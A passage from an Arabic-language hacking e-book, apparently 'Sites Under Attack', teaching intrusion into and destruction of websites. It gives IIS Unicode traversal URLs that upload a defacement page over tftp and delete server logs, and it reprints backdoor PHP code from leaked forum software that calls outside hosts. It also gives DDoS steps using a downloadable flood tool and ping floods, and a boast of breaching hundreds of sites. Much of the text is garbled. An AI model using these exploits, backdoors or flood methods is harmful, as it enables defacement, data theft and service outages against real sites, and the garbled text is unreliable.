الانبدأنافي النقطةالخطرة وهيتحمیلالملفات<br />
مع العلمأنياقصدبالتحمیلالابلود<br />
أي<br />
أبلود =تحمیل<br />
موتجمیل<br />
وتحمیلالملفات طریقةمعقدة نسبیاًبسأنا متفائلبالخیرلأنيمعتقدأنكم راحتفهمو<br />
المهم نرجعلموضوعنا<br />
المهم طریقة نسخالملفاتتضا فایضاً الىالمتصفح<br />
وتضا فبهذه الطریقة<br />
: مثال<br />
http://www.xxxxx.<strong>com</strong>/scripts/..ü€€€....exe?/c+dir+ c : \<br />
تخیل الثغرة هذهاشتغلتمعاك<br />
ویجب علیكإنكتمسح بع ضالإ ضافات من الثغرةلكيتضی ف امرالنسخ<br />
/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm<br />
یعني الى راح نمسحه منالثغرةبیكون هذهالاضافة<br />
/c + dir+c:\<br />
عشانتظی فبدالها<br />
/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm<br />
ولمن نظی فامر النسخ بیطلعلنابهذا الطریقة<br />
"-http://www.xxxxx.<strong>com</strong>/scripts/..ü€€€...xe?/c+tftp.exe+<br />
i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm<br />
شایفین یاشبابإ شالى اتغیر<br />
بس لازمأیضاًإنكتغیراللازمفيأمرالنسخ<br />
مثل<br />
tftp.exeهذا سیبهفي حاله لانهاسمبرنامج التيا فتيبي الى حاطهفي السي ومشغلهالان<br />
"i - "هذابرضه سیبه لانه مهم<br />
1.1.1.1هنابدالالارقام هذاتكتبالایبيتبع جهازك وعشان تتأكد منالایبيلمنتشغبالتيا فتيبي<br />
راح یطلع ایبي وهذاالایبيالى طلعلك هوالىتكتبه<br />
GETهذهالاضافة سیبهافي حالها لانهاتعتبر شرطفي نسخ المفات<br />
٧٧
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
index.htmهذهاسمالصفحة الى راح تتحمل وممكنتغیرها عاد بكیفكانت<br />
\C:\inetpub\wwwrootوهذا مكانتواجدالصفحةالرئیسة الخاصةبالموقع<br />
index.htmهناتكتبإسمالصفحةاوالمل فالتيتریدهأن یظهرفيالموقع<br />
\:Cیجبالتأكد منإنك حاطالصفحة المرادتحمیلهافي جهازك داخلال<br />
index.htmومثلااسم الصفحة<br />
قبل ماتضغطانتر عشانتنسخالمل فتاكد منان الثغرةالان صارت مشابهالمثل هذه الثغرة<br />
"-http://www.xxxxx.<strong>com</strong>/scripts/..ü€€€...xe?/c+tftp.exe+<br />
i"+212.212.212.212+GET+index.htm+C:\inetpub\wwwroot\index.htm<br />
ولو طلعت مشابهالهااضغ ط إنتروتوكل علىاالله<br />
وبإذناالله راحیتنسخ المل ف<br />
------------------------------------------------------------------------------------------------------<br />
--------------------------------------------------------------------------------<br />
وفى النقطةالا خیرة والاهم<br />
مسح ملفاتتكونتجمعت داخل الجهاز ومكونة معلومات عنك مثلالایبي<br />
http://server/msadc/..À¯../..../c+del+c:/*.log<br />
--------------------------------------<br />
**************************************************************************************<br />
٥-النسخه المنتشرهفي النت ودورالمعربین العرب وحقیقةالموضو عوتعریبهم<br />
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^<br />
اولاكماقلنالماذا لایخترقوا منتدیات جون ر غ مثغرات موقعه <strong>١</strong>لانه یستخدم نسخه نضیفه<br />
<strong>١</strong>-النسخه الموجودبالنت ملیانثغرات وعارفین جید مصمممي المنتدي لاماذا ینشرونه اذا$<br />
النسخهتجریبي ومحتويكود التبلیغ لاكيلو نفذت ومسحتكودالتبلیغلنتهرب منثغراتهلوتشغل<br />
فكركلكشفتهبنفسك<br />
٢ -انه جمیعه نسخهتجریبي لترویجبضعتهمبدلاانتكونلمدة ٣٠یومافهمتموني<br />
٣-النسخهالامنتشرهبالانترنت هو نسخه نحصل علي من مواقع هكرز صح وینكانت من هكرزالغرب<br />
وحیلهم<br />
لوتمكنتفي ال حصول علي نسخةالشركة <strong>١</strong>٠٠% ونسخه منتشرهفيالنتلرئیت صحقاموابحذ فكود<br />
التبلیغ منهبلاضافواالیهكوداد وبلاويوثغرا ت-وبعدین یجيالا خ صاحب النسخه یوكدانهلقيثغرة<br />
بمنتدیات جون<br />
والعالم ینده شكیییییی ف خلا صانشهر موقعه وسعراعلاناتهارتفعفي موقعهلكثرالزوار<br />
الحقیقة هو نفسهاضا ف الكود ونفسهیعر ف مكانه وكیفةالعبفیه واالله هكذاالامور<br />
المعربینالعربلیسوااقل نذلا من الاجانب<br />
انصحكم بتعریب نسخكمباانفسكم<br />
٧٨
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
قبل فترهبسیطهتم اكتشا فثغرهفي بع ض نسخ ٢٫٢٫٥المسربهلنا مناخوانناالعرب وكان هذاالكود<br />
الموجودفیهافي مل فforum<br />
PHP:<br />
--------------------------------------------------------------------------------<br />
if ($action=="modify") {<br />
$<strong>vb</strong>xh = h;<br />
$<strong>vb</strong>xt = t;<br />
$<strong>vb</strong>xp = p;<br />
$<strong>vb</strong>xw = w;<br />
$<strong>vb</strong>xa = a;<br />
$<strong>vb</strong>x1 = 1;<br />
$<strong>vb</strong>xr = r;<br />
$<strong>vb</strong>xb = b;<br />
$<strong>vb</strong>xn = n;<br />
$<strong>vb</strong>xe = e;<br />
$<strong>vb</strong>xo = o;<br />
$<strong>vb</strong>xy =y;<br />
$<strong>vb</strong>xl = l;<br />
echo "";<br />
--------------------------------------------------------------------------------<br />
وكان الكودال حلو هذایتصلفي موقع<br />
http://www.arab1.net/<br />
http://www.arab1.net/~royal/.x.php?h=<br />
$HTTP_HOST&h2=$SCRIPT_NAME<br />
عموما معالایام نزل ت نسخه ٢٫٢٫٦ وسربوهالنا حبایبنا وشالواكودالتبلیغ یاعیني علیهم عشان ی حطون<br />
لناكودتجسس ونعمالاخوه العربالمسلمین<br />
بس هالمرهالكوداذكى ومهو مكشو ف وغبي زيالاولالكودالمره هذيفي ملفین ملف optionبالاخیر<br />
موجود<br />
PHP:<br />
--------------------------------------------------------------------------------<br />
echo "
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
echo " -->";<br />
--------------------------------------------------------------------------------<br />
ومل فfunctions<br />
PHP:<br />
--------------------------------------------------------------------------------<br />
$sqlupdate =<br />
base64_decode('aHR0cDovL3NhdWRpLm5vLWlwLmN<strong>vb</strong>S9+cm9<br />
5YWwvLngyLmluYw==');<br />
--------------------------------------------------------------------------------<br />
یاعیني علىالذكاء صرنانعر ف نلعبباكدوا دیكود وانكود والمره هذي بعدیتص ل الكود ال حلو هذااللي<br />
مستخدمینفیه دیكودبالموقع هذا<br />
.<br />
http://saudi.no-ip.<strong>com</strong>/<br />
بیرحبفیكم ویقولكمarab1.net WELCOME TO<br />
http://saudi.no-ip.<strong>com</strong>/~royal/.x2.inc الليفیهاكود<br />
یاعیني عالترحیب<br />
عموماالكودبیتصلبالصفحه هذي<br />
رهییییییب ویبینلنا .......اللي ی حسبون علیناكمسلمین وعرب<br />
شوفو الكود<br />
PHP:<br />
--------------------------------------------------------------------------------<br />
<br />
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
$file = fopen("$open", "r");<br />
$rf = fread($file, 1000);<br />
fclose($file);<br />
?><br />
--><br />
<br />
واخرهكان دار العربفي ملفه هوبیعر ف<br />
************<br />
٦-الحمایه منالمخترقینبنسبة ٨٠% لااجهزتكم ومنتدیاتكم<br />
یااللهكل یوم نسمعاختراق المنتدیاتالیكم الحل<br />
حمایة٨٠%الیكماسباباخترقه وحمایته<br />
- <strong>١</strong> وجودثغراتبمجلدالادمن<br />
-٧<br />
-٨<br />
٧-<br />
٢-ثغرة مجلد مود<br />
٣-ثغرةالاستیل<br />
٤-الهتمل<br />
٥-كوكیز<br />
٦-دعم التلنت<br />
علىالمجلد ویندوزC:\Windows Cfgwiz32.exe<br />
من المل فmisc<br />
٩- وجودبات شبجهازكتمارسلهلك منقبل المخترقل حصولبمعلوماتك<br />
**************************************************************************************<br />
٧-كیفیةالحمایة<br />
^^^^^^^^^^<br />
<strong>١</strong>-قمبحمایة مل فالادمن جیدا .htaccess شغلفقطفي سرفراتالینوك سلیس ویندوز<br />
٢-قمبحمایتهhtaccess.<br />
٣- لاتركب ستیلاتكثیر یسبببثغرةباالمنتدي<br />
٤- لاتفعللغةالهتملابدا<br />
٥-احذر منالكوكز نظ ف جاهزك دائما<br />
٦-قم بتوقی ف التل نیتلموقع عندمالاتحتاجه<br />
نأكد من عدم وجود مل فباسم Cfgwiz32.exe علىالمجلد ویندوزC:\Windows<br />
٨- دهبلووووويالدنیافیه جاري الب حث عن حلله<br />
٩-قم بتركیببرامجالفیروسا تبجهازك …<br />
٨<strong>١</strong>
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
"مصطلحات مهمة للمبتدئين في اختراق المواقع"<br />
$$$$$$$$$$<br />
الكاتب : علي زائر<br />
$$$$$$$$$$<br />
سنعرجفي هذا الموضو ع على مصطلحات وأمورهامة یجبانتعر ف علیها سویاقبلالبدء<br />
=======================================================<br />
تلنت -:(Telnet) و هوبرنامج صغیر موجودفيالویندوز . و هویعملككلاینت<br />
أو وضعیتهتكون دائما كزبون .أيأنباستطاعة هذاالبرنامجالإتصالبالسیرفر<br />
أوالخادم واجراء بع ضالعملیاتكل حسب مستواها و حالتها .یستخدمه الهكرزد غالبال لإتصالبالسیرفر<br />
عبربورتمعین و خصوصابورتالإفتيبي ) ٢<strong>١</strong>)للدخولالىالموقعبطریقة خفیة<br />
Anonymous Mode لعر ض ملفات الموقع و سحب مل فالباسورداو غیره منالبیانا ت.<br />
لاستخدامالبرنامج ،اذهبالى<br />
Start ==> Run ==> telnet و ستظهر شاشةالتلنت .<br />
------------------------------------------------------------------------<br />
برامج السكانأو -:Scanner و هيبرامج موجودةللمسح علىالمواقع وكش ف<br />
ثغراتهاإن وجدت ،فهي سریعة،كماأنهاتملكقاعدةبیانات واسعة وكبیرة<br />
تحتوي علىالثغراتأوالاكسبلویت (Exploits)التيیتمتطبیقها علىالموقع<br />
لرؤیةفیمااذاكانالسیرفریعاني مناحد ى هذهالثغرا تأم لا . و منأمثلة<br />
هذه البرامج،برنامج<br />
الخ<br />
برمجةالأ خ عمران<br />
ولهذهالبرامجأنوا ع مختلفة ، منهاالتيتقوم بعمل سكان على نظامأو سیرفر<br />
معین مثل البرامجالمختصةبالسكان على سیرفراتال IIS و منهابرامج المسح<br />
علىثغرات السي جيايفقط CGI و ماالى ذلك<br />
Shadow Security Scanner و Stealth و<br />
. Omran Fast<br />
.<br />
-----------------------------------------------------------------------<br />
وهذاالبرنامجا لعربي من<br />
اكسبلویت -:(Exploits) هيبرامجتنفیذیةتنفذ من خلالالمتصفح . ولها عنوانURL ،تقوم هذه<br />
الإكسبلویتات بعر ض ملفاتالموقع وتقوم بعضهابالدخول الىالسیرفر و التجولفیه ،كماتوجد<br />
اكسبلویتاتتقومبشن هجوم علىبورتمعینفيالسیرفر لعملكرا شله ، و هذا ما یسمى ب<br />
Buffer<br />
. Over Flow Exploits<br />
Unicodes و منهاال CGI Bugs CGIأوال Exploits<br />
Exploits و منهاال ، Exploits ، Buffer Over Flow و منهاال PHP Exploits ،و منها<br />
هناكأنوا ع منالإكسبلویت ،فمنهاال<br />
الExploits DOS والتيتقوم بعملیة حجبالخدمةللسیرفرإن وجدفیهاالثغرةالمطلوبةلهذاالهجوم<br />
وانلم یكن علىالسیرفرأيفایروول . Fire Wall و هناك بع ضالإكسبلویتات المكتوبةبلغة السي و<br />
یكون امتدادها<br />
هذهالإكسبلویتاتبالذاتتحتاجالىكومبایلر Compilerاوبرنامجا لترجمتها وتحویلها الىاكسبلویت<br />
تنفیذي عادي یستخدم من خلالالمتصفح، و لتحویلالإكسبلویت المكتوب بلغةالسي هذه الىبرنامجا<br />
تنفیذیا ، نحتاجإماالى<br />
نظامالتشغیللینوكساو یونكس ،او الىايكومبایلریعمل ضمن نظامالتشغیل ویندوز .أشهر هذه<br />
الكومبایلرس (المترجماتأوالمحولات )برنامجاسمه<br />
نظامالتشغیل ویندوزكما ذكرنا سابقا.<br />
----------------------------------------------------------------------<br />
Borland C++ Compiler و هيتعملتحت<br />
. (c.)<br />
٨٢
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
الجدارالناري -:FireWall هيبرامجتستعملهاالسیرفراتلحمایتها منالولوجالغیر شرعيلنظام<br />
ملفاتها منقبلالمتطفلین .هيتمثل الحمایةللسیرفر طبعا ، ولكنيأنوه بأن الفایروولاتالمستخدمة<br />
لحمایةالسیرفرات (المواقع )تختل ف عنتلك التيتستخدملحمایة الأجهزة<br />
.<br />
----------------------------------------------------------------------<br />
-:Token هو مل فالباسورد المظلل Passwd) (Shadowed و الذي یكونفیهالباسورد<br />
على شكل *أو xأي Shadowed .إن وجدت مل ف الباسورد مظللا ،فیجب علیك حینها الب حث عن<br />
مل فالباسوردالغیر المظلل و الذي یسمى<br />
----------------------------------------------------------------------<br />
Anonymouse:-هيالوضعیةالخفیة والمجهولة التيتدخلفیهاالىالموقعالمراد اختراقه.هناك<br />
خاصیةفيبرامجالا فتيبيبنفسالإسم ،تستطیعانتستعملهافي الدخولالمجهول الىالسیرفر و<br />
سحبالملفات منه وهذهأصبحت نادرة نوعا ماالآن<br />
----------------------------------------------------------------------<br />
Valnerableties:-أي الثغراتأو مواضع الضع فالغیر م حصنةأو القابلةللعطب و التيیعاني منها<br />
السیرفر والتيقدتشكل خطراأمنیا علیه مما یؤديالىاستغلالها منقبل الهاكرزفي مهاجمةالسیرفر و<br />
اختراقهأوتدمیره<br />
ما هي مفردها ؟ ، Valnerableأيثغرةأوبالأصح موضعالضع ف والمكانالغیر مؤمنبشكل سلیم<br />
. وتكثر هذهالكلمةفي القوائمالبریدیةللمواقعالمهتمةبالسیكیوریتي وأمنالشبكات و غیرهاكالقائمة<br />
البریدیة الموجودةفي موقع Securityأوباقتراكاو Focus غیرها<br />
. etc/shadow/<br />
.<br />
Shadow file .تجدهفي<br />
.<br />
.<br />
(:<br />
----------------------------------------------------------------------<br />
passwd file<br />
:هوالمل فالذي یحتوي علىباسورد الروت وباسوردات الأشخا صالمصرحلهم<br />
بالدخولالىالسیرفر .باسوردالموقع موجودفي نفسالمل ف طبعا و غالبا ما یكون مشفر وبمقیاس DES<br />
.<br />
----------------------------------------------------------------------<br />
الجذرأو ال : root وهو المستخدم الجذري والرئیسيللنظام ،لهكلالصلاحیاتفي التعامل مع ملفات<br />
الموقع والسیرفر منإزالةأواضافةأوتعدیلللملفات.<br />
غالبا ما یكونباسورد الروتهوباسورد الموقع نفسهفيالمواقع التيتعمل ضمن نظامالتشغیللینوكس<br />
و غیرها<br />
او یونكسأو سولاريأو<br />
. Free BSD<br />
----------------------------------------------------------------------<br />
السیرفر Server :هوالجهازالمستضی فللموقع ،اذأنكل ملفاتالموقعتوضعفیهفهو جهازكمبیوتر<br />
عاديكغیره منالأجهزةلكنه ذوامكانیات عالیةككبر حجمالقر صالصلب والرام والكا ش میموري و<br />
سرعته الهائلة ، و هو متصلبا لإنترنت ٢٤ ساعة ، و هذا هو سببكون المواقع شغالة ٢٤ ساعة على<br />
ا لإنترنت :) .قد یستضی فالسیرفرأكثر من موقع واحد، و هذایعتمد من سیرفر لآخر و من شركةلأخر ى.<br />
ضربة الهاكرز طبعاهياختراقالسیرفر الذي یملكالكثیر من المواقع ،فیسهل حینهااختراق جمیع<br />
المواقع التيتندرجتحته مما یؤديإما الىتدمیرهاأو العبثفي ملفاتهاأوتشویه واجهتهاأو سرقة<br />
بیاناتها وتدمیرهاأو مسحها منالنتتماما ، و هذا ما یحد ثللمواقعالإسرائیلیة و بكثرة و اللهالحمد<br />
- .<br />
جزاكماالله خیراأیهاالمجاهدون وأذكرانيفيأخر مرةاخترقت سیرفر یحتويقرابة ٣٦٧ موقع وحصلت<br />
على جمیع ملفاتالكونفیج الموجودة داخلالسیرفر وفیها طبعاالباسورداتبدون تشفی ركمانعلم وهي<br />
الخاصةبمجلاتالنیوك وكذلكالخاصةبالادمنلبرامج المنتدیات والبقیة من خلال فتحتشفیرالباسوردات<br />
ببرنامج جونتستطیع مباشرة مناختراق الموقع منالا فتيبيبلا عناء وحذ فكل مافیه<br />
. -<br />
-----------------------------------------------------------------------<br />
٨٣
hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
) Flow ( Buffer over : وهي نو ع منأنوا عالاكسبلویتاتالتيتستعمللشن هجوم<br />
.<br />
بوفرأوفرفلو<br />
الطفح على نقطةمعینة منالسیرفر مثل الهجوم علىبورتالإفتيبيأو غیرهلأجلاضعا ف اتصال<br />
السیرفر وفصل اتصالهبهذابهذاالبورت و لالغاءالرقعةالموجودةبهاكيیتماستغلالها مجددا - بعد عمل<br />
الكرا شلها طبعا -یتماستغلالهافيمعاودةالإتصاللها وبسهولة و دون وجودأي رقعاو حواجز و<br />
سحبالبیانات منها<br />
و هي شبیهة نوعا ما بعملیة حجبالخدمة -اذأنهاتقوم بعملیةاوفرلود على جزء مركز من<br />
DOS -<br />
السیرفر ...<br />
٨٤
hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
داینامیكیة تدمير المواقع<br />
"<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
"<br />
.<br />
$$$$$$$$$$$$$$$$<br />
الكاتب MaXhAk2000:<br />
$$$$$$$$$$$$$$$$<br />
-<strong>١</strong><br />
-٢<br />
یعدتدمیرالمواقع من الأشیاء السهلة والنافعة والتي یصحبها خساا ئرفادحةللموقعالمستهد ف<br />
حیثاذاتمتدمیر الموقع وایقافه عنالعمل حتىلولمدة محدودهفسیخسرالموقع خسائربالأ فاو<br />
بالملایین وعلى حسب شهرةالموقع<br />
وتدمیر المواقع لایتمالا بأشتراك مجموعةكبیره لاتقلفيأغلبالأحیان عن ٢٠٠ شخ صأوأكثر<br />
وكلماكثرالعددكلماتمتدمیرالموقعبسرعةأكبر وفي وقت أقصر وهناك مواقعكثیرهتقومبمثل هذاالأمر<br />
منهاالموقعالمكافح الناصرللأ سلام موقع الجادالألكتروني الذيتعر ضلوق ف طالت مدته وعاد بعد ذلك<br />
بقوهاكبر ولایزال الموقع مستمرفي هذه الهجمات والجهاد وقدتمتدمیر موااقعكثیره عن طریق<br />
التعاون مع هذاالموقع ....<br />
وألیةتدمیرالمواقعتكمنفياشاء عدة منها :<br />
استخدام الطرقالتقلیدیةالتي تتم عن طریق الدوسكما سیتمالشرح لاحقاان شاءاالله.<br />
استخدام بع ض البرامجالقویه والفاعلة التي اثبتت جدارتهاامام المواقعالمعادیة مثلبرنامجالدرة<br />
الشهیر. والذي سیتم شرحه لاحقاان شاءاالله...<br />
٨٥
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
$$$$$$$$$<br />
م ن ق ول<br />
$$$$$$$$$<br />
"<br />
شرح برنامج<br />
الدرة لتدمير المواقع<br />
"<br />
حملالبرنامج من عملیةبحثبواسطة ملكالبحث جوجل.<br />
عند ا لإنتهاء منتحمیلالبرنامج ،فك ضغ طالمل ف ، و عندتشغیله سیظهرلكالشكلالتالي<br />
:<br />
لبدء الهجومفقطإ ضغط على<br />
ولإیقا فالهجومإ ضغط على<br />
عندبدءالهجوم سیعملبرنامجالدرة علىبح ثالبروكسيالخا صبك و سیضعهلكفي مكانه.<br />
و لتخفيهویتك عند الهجومقم بتشغیل:<br />
٨٦
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
و ضع رقمالبروكسيالتالي<br />
وسیكون عنوان الموقع المراد الهجوم علیه هنا<br />
و من خوا ص هذا البرنامجانه لا یستطیعاحدتغییر جهة الهجوم ولتجدید عنوانالموقعالمرادالهجوم<br />
علیهفقطقمبضغط وهو سیقومتلقائیابالبح ث والتغییر.<br />
ولمعرفة آخراخبارالبرنامج والمواقع التيتمالنجاح بقصفهافقطقمبضغط<br />
:<br />
و سیظهرلكالشكل التالي<br />
:<br />
قمبضغط<br />
و ستظهرلكالأخبار .<br />
و لعملالبرنامجبطریقة ذكیةب حی ث لا یبطيء ا لإنترنت ،قم بتشغیل<br />
:<br />
٨٧
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
لتشغیلالبرنامج عند عمل الوندوزقم بتشغیل:<br />
الشكل التالي یمثل عدد المراتالناجحة<br />
و هذا یمثل عددالمرات الفاشلة<br />
:<br />
:<br />
وصلةتحمیلالبرنامج ..<br />
http://www.geocities.<strong>com</strong>/boom_q8y4/dorrah.zip<br />
…<br />
٨٨
hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
تدمير المواقع بدون برامج<br />
"<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
"<br />
$$$$$$$$$$$$$$$$<br />
الكاتب MaXhAk2000:<br />
$$$$$$$$$$$$$$$$<br />
في هذا الدرس سأقومبشرح عدة طرق لتدمیر المواقعبدونبرامج ولكن هناك شرط لتدمیرهاأن یجتمع<br />
عددكبیرقد یصلفي بع ض الأ حیان الىاعلى من ٢٠٠ شخ ص علىالموقع نفسه ویقوموا بتطیقالطریقة<br />
معا بع ضفي نفسالوق ت...<br />
الطریقة الأولى::<br />
قمبالتوجهإلى<br />
" الدوس" ===>== اكتبالأمرالتالي :<br />
یعنياسمالموقع<br />
بعد ذلك سیخرجلك رقمأيبي الموقع.<br />
قم بكتابةالأمر:<br />
Ping www.xx.<strong>com</strong><br />
Xxx<br />
(اسمالموقع) (قوةالضربه) I- (عددالضربا ت) ping n-<br />
مثال ذلك :<br />
الطریقةالثانیة::<br />
بعداستخراج الأيبيتبعالموقع المرادبالطریقةاليفي الأعلى...<br />
قم بكتابةالأمر:<br />
ping -t ip<br />
حیث ipیعنيأيبيالموقعالموراد....<br />
ping -n 1000 -l 400 www.xxx.<strong>com</strong><br />
٨٩
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
" Routing in the Internet<br />
www.3 asfh.<strong>com</strong>/<strong>vb</strong><br />
"<br />
معلومات عن<br />
.....<br />
$$$$$$$$$$$$$$$$$$<br />
الكاتب BURN_EG: ACID<br />
$$$$$$$$$$$$$$$$$$<br />
موضو ع هاملنقطة هامةفيالشبكات واوداناضیفاضافةبسیطة وهيانالروتیر هو جهازللتوصیل<br />
بین عدة شبكات متباعدة (( ولمنیعر ففكرةالخب HUBفال Router یقومبنقس المهمة وهو جهاز<br />
یختل ففي حجمهباختلا ف المساحات اليیعملفي نطاقها وقدقمت بزیارةلبع ض شركاتمزوديالخدمة<br />
عن طریق بع ضالاصدقاء ورایت عدة راوترات وبعدةاحجام واستطیعاناقولبان متوسط حجمهتقریبا<br />
٥٠ سم على شكل مكعب<br />
٤٠ سم *<br />
Routing in the Internet:<br />
===================<br />
what is routing?!<br />
الروتنج هو عباره عن طریقةمعینة والتي عن طریقهاتنتقلالمعلومات منكمبیوترالىاخراو من هوست<br />
الىاخر.<br />
وفى سیاقالانترنت یوجدثلا ث مظاهر منالروتنج وهم:<br />
Physical Address Determination -<strong>١</strong><br />
Selection of inter-network gateways -٢<br />
Symbolic and Numeric Addresses -٣<br />
ویعتبرالاولهو المهم فعندماتنتقلبیاناتال ip منالكمبیوتر.فمن الضرورىان نغل ف هذهالبیانات<br />
الخاصهبال ip بأىأطار مناى صیغهتكون متصلهبالشبكةالم حلیهللجهازاوبالشبكة المتص لبها<br />
الجهازفى حالتهالموجود علیها عندانتقال هذهالبیانا ت. ویتطلب هذا الغلا فالتضمین من عنوانالشبكة<br />
الم حلیهاو العنوانالفیزیائىلهذا الشبكه مع الاطارالذى ی حیطبالبیانات ا ى (inclusion of a local<br />
network address or physical address within the frame).<br />
.<br />
و الشئالثانى من المذكوراعلاه مهمایضا و ضرورىلانالانترنت تتكون من عدد منالشبكاتالم حلیة<br />
مرتبطةبواحداوأكثر منالمداخلاىال.gateways و هذهالمداخل عموما<br />
احیانا یكونلها اتصالا تفیزیائیهاوبورتات مع الكثیر من<br />
تسمىبالروترسا ى<br />
الشبكات .وتحدیدالمدخل الملائم والبورت لتفصیلبیاناتالip هذا ما نسمیه روتنجاى routing و<br />
تتضمنایضا داخلتبادلالمعلوما تبطرقمعینه<br />
اى local networks<br />
ال, routers<br />
والثالث منالمذكورهوالذ ىیتضمنانتقالالعنواناىال address translation منالشكلالكتابى<br />
الذ ىنعرفه و نستطیع التعر ف علیهبسهوله والمقصود مثلا عنوانالمتصفحا ى<br />
http://<strong>www.3asfh</strong>.<strong>com</strong>/ الى ip ا ىالى اشیاء رقمیهمعقدهصعبه وتؤد ى هذهالمهمه عن طریق<br />
الDNS<br />
٩٠
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
Physical Address اى :<br />
www.3 asfh.<strong>com</strong>/<strong>vb</strong><br />
والان ندخلفى شرح عملیهتحدید ال<br />
Physical Address Determination:<br />
===============================<br />
.<br />
اذاكان یرید جهازكمبیوتران ینقل ip data اذنفأنه یحتاجالىان یغل ف بأطار مخص ص وتابعللشبكة<br />
المتصلالجهازبها. ولنجاح هذاالانتقالفى ظ لالتغلی فبهذاالاطار من الضرورىان نحدد ما یسمىبال<br />
physicalلأتجاهالكمبیوتر. address و هذایتمبنجاح و ببساطه عن طری قاستخدام جدول سو ف<br />
یوضحكیفیهتحویلال ip الى , addresses physicalفمثلا هذاالجدول یحتوى على عناوینال ip<br />
للشبكة اوالعنوان المعرو فلها<br />
ولل حصول على هذا الجدول وقرائته منالطبیعىان یكونالكمبیوتر یستخدمبروتوكولمعینلل حصول<br />
على هذا الجدول وتحویلال ipالى physical addresses و هذاالبروتوكولیعر فبأسم ARP اى<br />
Addressاىبروتوكولت Resolution Protocol حلیل العنوان واعتقدانناالانادركنا وفهمنا<br />
معنىكلمهتحویلال ipالى , addresses physicalو یمكناننعر ف هذاالجدول بأسم ARP<br />
cache .<br />
ولل حصول على الجدول نستخدمامر arp a- وفىالیونكسایضا نستخدم نفسالامر.<br />
و هذا مثال حى على الجدولالذى یظهر بعدتنفیذ الامر<br />
:<br />
C:\ WINDOWS>arp -a<br />
Interface: 62.135.9.102 on Interface 0x2<br />
Internet Address Physical Address Type<br />
207.46.226.17 20-53-52-43-00-00 dynamic<br />
213.131.64.2 20-53-52-43-00-00 dynamic<br />
213.131.65.238 20-53-52-43-00-00 dynamic<br />
الانترنتادرسالموجودامامكم هذاهى عناوینكل الشبكاتالمتصلهبجهاز ى بعد دخولى الىالانترنت<br />
وال Physicalاعتقدانكمتلاحظونانهثابت Address لایتغیر وبهذا یمكنناان نقول و نوضحلكم<br />
انال Physicalهذا Address هوال Macا Address ى رقم الجهاز نفسه الذى تتصلبه<br />
النتوركس اثناءالعمل ولذلكفقدقلتفىكلامىانتحدیدال Physical Address مهم جداافى<br />
اذنفكی ف ستعر فالباكیدجس<br />
عملیه<br />
الموجودهفىال routerعلى طریقها.<br />
وال type هذا مكتوب dynamic ا ىانه غیرثابتبمعنىانهیتغییر عند عمل ریستارتلكل مرهفى<br />
الجهاز ولكنه یثبت اثناءالعمل علىالانترنت .<br />
و هناكالنو عالاخر وهوال staticاى الثابتالذ ى لایتغیر "هذافقطللتوضیح "<br />
نقلمعلوماتاوبیاناتال ip لانهبدون Physical Address<br />
اعتقدالاناننافهمنابمعنىبسیط<br />
ما هوالروتنج و ماهىالrouters<br />
...<br />
٩<strong>١</strong>
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
www.3 asfh.<strong>com</strong>/<strong>vb</strong><br />
الفصل الثالث<br />
<br />
((مقتطفات عن<br />
السیرفراتوالأنظمة))<br />
٩٢
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> www.3 asfh.<strong>com</strong>/<strong>vb</strong><br />
"<br />
الإختراق عن طریق الیونیكود<br />
(الجزء الأول) "<br />
$$$$$$$$$$$$$$$<br />
الكاتب sNiper_hEx:<br />
$$$$$$$$$$$$$$$<br />
یحتو ى الدرسالاول على<br />
) <strong>١</strong>٣ نقطة<br />
